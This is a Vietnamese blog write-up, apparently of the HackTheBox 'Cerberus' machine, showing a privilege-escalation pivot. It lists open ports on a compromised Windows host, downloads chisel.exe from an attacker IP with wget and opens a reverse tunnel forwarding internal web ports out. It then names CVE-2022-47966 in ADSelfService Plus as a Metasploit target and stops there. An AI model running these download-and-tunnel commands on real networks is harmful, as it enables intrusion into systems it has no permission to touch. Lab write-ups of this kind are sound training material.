Cerberus - pric

byDryu8 2 min read
0

Nâng Quyền

Kiểm tra các port đang mở trên win box.
[127.0.0.1]: PS C:\Users\matthew\Desktop> netstat -a

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             DC:0                   LISTENING
  TCP    0.0.0.0:88             DC:0                   LISTENING
  TCP    0.0.0.0:135            DC:0                   LISTENING
  TCP    0.0.0.0:389            DC:0                   LISTENING
  TCP    0.0.0.0:443            DC:0                   LISTENING
  TCP    0.0.0.0:445            DC:0                   LISTENING
  TCP    0.0.0.0:464            DC:0                   LISTENING
  TCP    0.0.0.0:593            DC:0                   LISTENING
  TCP    0.0.0.0:636            DC:0                   LISTENING
  TCP    0.0.0.0:808            DC:0                   LISTENING
  TCP    0.0.0.0:1500           DC:0                   LISTENING
  TCP    0.0.0.0:1501           DC:0                   LISTENING
  TCP    0.0.0.0:2179           DC:0                   LISTENING
  TCP    0.0.0.0:3268           DC:0                   LISTENING
  TCP    0.0.0.0:3269           DC:0                   LISTENING
  TCP    0.0.0.0:5985           DC:0                   LISTENING
  TCP    0.0.0.0:8888           DC:0                   LISTENING
  TCP    0.0.0.0:9251           DC:0                   LISTENING
  TCP    0.0.0.0:9389           DC:0                   LISTENING
  TCP    0.0.0.0:47001          DC:0                   LISTENING
  TCP    0.0.0.0:49664          DC:0                   LISTENING
  TCP    0.0.0.0:49665          DC:0                   LISTENING
  TCP    0.0.0.0:49666          DC:0                   LISTENING
  TCP    0.0.0.0:49667          DC:0                   LISTENING
  TCP    0.0.0.0:49681          DC:0                   LISTENING
  TCP    0.0.0.0:49682          DC:0                   LISTENING
  TCP    0.0.0.0:49894          DC:0                   LISTENING
  TCP    0.0.0.0:49907          DC:0                   LISTENING
  TCP    0.0.0.0:49918          DC:0
Port forwarding 80, 443, 8888, 9251 và kiểm tra chúng.
PS D:\thehackbox\tool\chisel\win> .\chisel.exe server --port 6666 --reverse
2023/03/29 09:39:35 server: Reverse tunnelling enabled
2023/03/29 09:39:35 server: Fingerprint xABpBJ1+xSi1JTuW+fNUgvtLXvMMc0OlTSedt5ca0OA=
2023/03/29 09:39:35 server: Listening on http://0.0.0.0:6666
2023/03/29 09:39:43 server: session#1: tun: proxy#R:80=>localhost:80: Listening
2023/03/29 09:39:43 server: session#1: tun: proxy#R:443=>localhost:443: Listening
2023/03/29 09:39:43 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening
2023/03/29 09:39:43 server: session#1: tun: proxy#R:9251=>localhost:9251: Listening

#--------------

[127.0.0.1]: PS C:\Users\matthew\desktop> wget http://10.10.**.**/chisel.exe -O chisel.exe
[127.0.0.1]: PS C:\Users\matthew\desktop> ls

    Directory: C:\Users\matthew\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/28/2023   7:00 PM        7352320 chisel.exe
-ar---        3/28/2023   8:22 AM             34 user.txt

[127.0.0.1]: PS C:\Users\matthew\Desktop> ./chisel.exe client 10.10.**.**:6666 R:80:localhost:80 R:443:localhost:443 R:8888:localhost:8888 R:9251:localhost:9251
./chisel.exe : 2023/03/28 19:39:38 client: Connecting to ws://10.10.**.**:6666
    + CategoryInfo          : NotSpecified: (2023/03/28 19:3...0.10.**.**:6666:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

2023/03/28 19:39:42 client: Connected (Latency 484.9877ms)
Auto redirect tới website dc.cerberus.local
Login web với domain và pass mà tôi đã tìm được trước đó.
Đây là website ADSelfService Plus, tìm kiếm vuln về ADSelfService Plus, tôi thấy có thể khai thác được với msf thông qua CVE-2022-47966
Khai Thác

4.94 / 169 rates
Dryu8

Dryu8 is just a newbie in pentesting and loves to drink beer. I will be happy if you can donate me with a beer.

Post a Comment

Previous Post Next Post